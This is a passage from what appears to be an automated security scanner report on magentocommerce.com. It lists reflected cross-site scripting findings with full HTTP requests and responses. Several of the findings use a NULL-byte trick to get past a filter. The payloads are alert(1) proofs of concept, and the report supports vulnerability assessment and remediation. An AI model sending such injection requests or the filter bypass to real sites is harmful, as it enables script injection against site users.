Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_WRUID=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_frontend=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=c; expires=Sun, 12-Aug-2012 01:16:15 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313176075; expires=Sat, 11-Aug-2012 15:07:55 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A99%3A%22%2Fmedia%2Fscreencasts%2Fprivate-sales-including-events-invitations-and-category-access-permissions%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:55 GMT
Content-Length: 33641

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view?%0091413"><script>alert(1)</script>c91b0ff721a=1">
...[SNIP]...

1.31. http://www.magentocommerce.com/media/screencasts/product-comparison/view [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/product-comparison/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a270"><script>alert(1)</script>52125fe349d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/product-comparison3a270"><script>alert(1)</script>52125fe349d/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176185; expires=Sat, 11-Aug-2012 15:09:45 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:45 GMT
Content-Length: 33501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/product-comparison3a270"><script>alert(1)</script>52125fe349d/view">
...[SNIP]...

1.32. http://www.magentocommerce.com/media/screencasts/product-comparison/view [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/product-comparison/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %003a6ad"><script>alert(1)</script>eff1795c9ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3a6ad"><script>alert(1)</script>eff1795c9ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/product-comparison/view?%003a6ad"><script>alert(1)</script>eff1795c9ed=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:08:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176132; expires=Sat, 11-Aug-2012 15:08:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A43%3A%22%2Fmedia%2Fscreencasts%2Fproduct-comparison%2Fview%2F%22%3Bi%3A1%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A2%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:08:52 GMT
Content-Length: 33317

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/product-comparison/view?%003a6ad"><script>alert(1)</script>eff1795c9ed=1">
...[SNIP]...

1.33. http://www.magentocommerce.com/media/screencasts/search/view [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/search/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfdc4"><script>alert(1)</script>6969d62cb31 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/searchdfdc4"><script>alert(1)</script>6969d62cb31/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176249; expires=Sat, 11-Aug-2012 15:10:49 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:49 GMT
Content-Length: 33489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/searchdfdc4"><script>alert(1)</script>6969d62cb31/view">
...[SNIP]...

1.34. http://www.magentocommerce.com/media/screencasts/search/view [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/search/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0066489"><script>alert(1)</script>107d780fdac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 66489"><script>alert(1)</script>107d780fdac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/search/view?%0066489"><script>alert(1)</script>107d780fdac=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176207; expires=Sat, 11-Aug-2012 15:10:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fmedia%2Fscreencasts%2Fsearch%2Fview%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:08 GMT
Content-Length: 33276

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/search/view?%0066489"><script>alert(1)</script>107d780fdac=1">
...[SNIP]...

1.35. http://www.magentocommerce.com/media/screencasts/single-page-checkout-guest-checkout/view [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/single-page-checkout-guest-checkout/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10b86"><script>alert(1)</script>e1f23b845dc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/single-page-checkout-guest-checkout10b86"><script>alert(1)</script>e1f23b845dc/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176269; expires=Sat, 11-Aug-2012 15:11:09 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:09 GMT
Content-Length: 33518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/single-page-checkout-guest-checkout10b86"><script>alert(1)</script>e1f23b845dc/view">
...[SNIP]...

1.36. http://www.magentocommerce.com/media/screencasts/single-page-checkout-guest-checkout/view [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/single-page-checkout-guest-checkout/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f92a3"><script>alert(1)</script>944016f3b45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f92a3"><script>alert(1)</script>944016f3b45 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/single-page-checkout-guest-checkout/view?%00f92a3"><script>alert(1)</script>944016f3b45=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176250; expires=Sat, 11-Aug-2012 15:10:50 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A60%3A%22%2Fmedia%2Fscreencasts%2Fsingle-page-checkout-guest-checkout%2Fview%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:50 GMT
Content-Length: 34222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/single-page-checkout-guest-checkout/view?%00f92a3"><script>alert(1)</script>944016f3b45=1">
...[SNIP]...

1.37. http://www.magentocommerce.com/media/screencasts/static-blocks/view [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/static-blocks/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b6e4"><script>alert(1)</script>98b5a898c24 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/static-blocks3b6e4"><script>alert(1)</script>98b5a898c24/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176162; expires=Sat, 11-Aug-2012 15:09:22 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:22 GMT
Content-Length: 33496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/static-blocks3b6e4"><script>alert(1)</script>98b5a898c24/view">
...[SNIP]...

1.38. http://www.magentocommerce.com/media/screencasts/static-blocks/view [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/static-blocks/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00df3f4"><script>alert(1)</script>c995222f5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as df3f4"><script>alert(1)</script>c995222f5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/static-blocks/view?%00df3f4"><script>alert(1)</script>c995222f5e=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_WRUID=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_frontend=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=c; expires=Sun, 12-Aug-2012 01:16:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313176072; expires=Sat, 11-Aug-2012 15:07:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fmedia%2Fscreencasts%2Fstatic-blocks%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:52 GMT
Content-Length: 34345

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/static-blocks/view?%00df3f4"><script>alert(1)</script>c995222f5e=1">
...[SNIP]...

1.39. http://www.magentocommerce.com/media/screencasts/transactional-email/view [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/transactional-email/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c3ea"><script>alert(1)</script>34fe324f96d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/transactional-email4c3ea"><script>alert(1)</script>34fe324f96d/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176233; expires=Sat, 11-Aug-2012 15:10:33 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:34 GMT
Content-Length: 33502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/transactional-email4c3ea"><script>alert(1)</script>34fe324f96d/view">
...[SNIP]...

1.40. http://www.magentocommerce.com/media/screencasts/transactional-email/view [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/transactional-email/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00996a5"><script>alert(1)</script>f2333fb71e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 996a5"><script>alert(1)</script>f2333fb71e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/transactional-email/view?%00996a5"><script>alert(1)</script>f2333fb71e2=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176167; expires=Sat, 11-Aug-2012 15:09:27 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A44%3A%22%2Fmedia%2Fscreencasts%2Ftransactional-email%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3Bi%3A2%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A3%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:27 GMT
Content-Length: 34475

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/transactional-email/view?%00996a5"><script>alert(1)</script>f2333fb71e2=1">
...[SNIP]...

1.41. http://www.magentocommerce.com/media/screencasts/upsells/view [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/upsells/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fea2e"><script>alert(1)</script>1e31a06b711 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/upsellsfea2e"><script>alert(1)</script>1e31a06b711/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:51 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176311; expires=Sat, 11-Aug-2012 15:11:51 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:51 GMT
Content-Length: 33490

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
